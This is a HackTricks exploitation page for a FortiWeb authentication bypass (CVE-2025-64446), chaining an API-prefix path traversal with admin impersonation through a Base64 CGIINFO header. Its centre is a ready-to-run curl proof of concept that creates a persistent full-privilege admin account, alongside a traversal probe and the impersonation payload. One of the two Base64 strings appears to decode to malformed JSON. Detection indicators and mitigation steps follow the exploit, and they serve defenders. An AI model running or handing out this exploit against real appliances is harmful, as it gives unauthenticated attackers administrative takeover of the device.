Fortinet FortiWeb — Auth bypass via API-prefix traversal and CGIINFO impersonation

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Overview

Fortinet FortiWeb exposes a centralized CGI dispatcher at /cgi-bin/fwbcgi. A two-bug chain allows an unauthenticated remote attacker to:

• Reach fwbcgi by starting the URL with a valid API prefix and traversing directories.
• Impersonate any user (including the built-in admin) by supplying a special HTTP header that the CGI trusts as identity.

Vendor advisory: FG‑IR‑25‑910 (CVE‑2025‑64446). Exploitation has been observed in the wild to create persistent admin users.

Impacted versions (as publicly documented):

• 8.0 < 8.0.2
• 7.6 < 7.6.5
• 7.4 < 7.4.10
• 7.2 < 7.2.12
• 7.0 < 7.0.12
• 6.4 ≤ 6.4.3
• 6.3 ≤ 6.3.23

FortiWeb 8.0.2 returns HTTP 403 for the traversal probe below.

Quick vulnerability probe

• Path traversal from API prefix to fwbcgi:

GET /api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: <target>

• Interpretation: HTTP 200 → likely vulnerable; HTTP 403 → patched.

Root cause chain

1. API-prefix path traversal to internal CGI

• Any request path that begins with a valid FortiWeb API prefix (e.g., /api/v2.0/cmdb/ or /api/v2.0/cmd/) can traverse with ../ to /cgi-bin/fwbcgi.

2. Minimal-body validation bypass

• Once fwbcgi is reached, a first gate performs a permissive JSON check keyed by a per-path file under /var/log/inputcheck/. If the file is absent, the check passes immediately. If present, the body only needs to be valid JSON. Use {} as a minimal compliant body.

3. Header-driven user impersonation

• The program reads the CGI environment variable HTTP_CGIINFO (derived from the HTTP header CGIINFO), Base64-decodes it, parses JSON, and copies attributes directly into the login context, setting the domain/VDOM. Keys of interest:
  • username, loginname, vdom, profname
• Example JSON to impersonate the built-in admin:

{
  "username": "admin",
  "profname": "prof_admin",
  "vdom": "root",
  "loginname": "admin"
}

Base64 of the above (as used in-the-wild):

eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb201OiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==

End-to-end abuse pattern (unauthenticated → admin)

1. Reach /cgi-bin/fwbcgi via an API-prefix traversal.
2. Provide any valid JSON body (e.g., {}) to satisfy the input check.
3. Send header CGIINFO: <base64(json)> where the JSON defines the target identity.
4. POST the backend JSON expected by fwbcgi to perform privileged actions (e.g., create an admin user for persistence).

Minimal cURL PoC

• Probe traversal exposure:

curl -ik 'https://<host>/api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi'

• Impersonate admin and create a new local admin user:

# Base64(JSON) for admin impersonation
B64='eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ=='

curl -ik \
  -H "CGIINFO: $B64" \
  -H 'Content-Type: application/json' \
  -X POST \
  --data '{"data":{"name":"watchTowr","access-profile":"prof_admin","access-profile_val":"0","trusthostv4":"0.0.0.0/0","trusthostv6":"::/0","type":"local-user","type_val":"0","password":"P@ssw0rd!"}}' \
  'https://<host>/api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi'

Notes:

• Any valid JSON body suffices (e.g., {}) if /var/log/inputcheck/<path>.json does not exist.
• The action schema is FortiWeb-internal; the example above adds a local admin with full privileges.

Detection

• Requests reaching /cgi-bin/fwbcgi via API-prefix paths containing ../ (e.g., /api/v2.0/cmdb/.../../../../../../cgi-bin/fwbcgi).
• Presence of header CGIINFO with Base64 JSON containing keys username/loginname/vdom/profname.
• Backend artifacts:
  • Per-path files under /var/log/inputcheck/ (gate configuration).
  • Unexpected admin creation and configuration changes.
• Rapid validation: the traversal probe returning 200 (exposed) vs 403 (blocked in fixed builds).

Mitigation

• Upgrade to fixed releases (examples: 8.0.2, 7.6.5, 7.4.10, 7.2.12, 7.0.12) per vendor advisory.
• Until patched:
  • Do not expose FortiWeb management plane to untrusted networks.
  • Add reverse-proxy/WAF rules to block:
    • Paths that start with /api/ and contain ../cgi-bin/fwbcgi.
    • Requests carrying a CGIINFO header.
  • Monitor and alert on the detection indicators above.

References

• When the impersonation function gets used to impersonate users — Fortinet FortiWeb auth bypass (watchTowr Labs)
• watchTowr vs FortiWeb Auth Bypass — Detection artefact generator

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.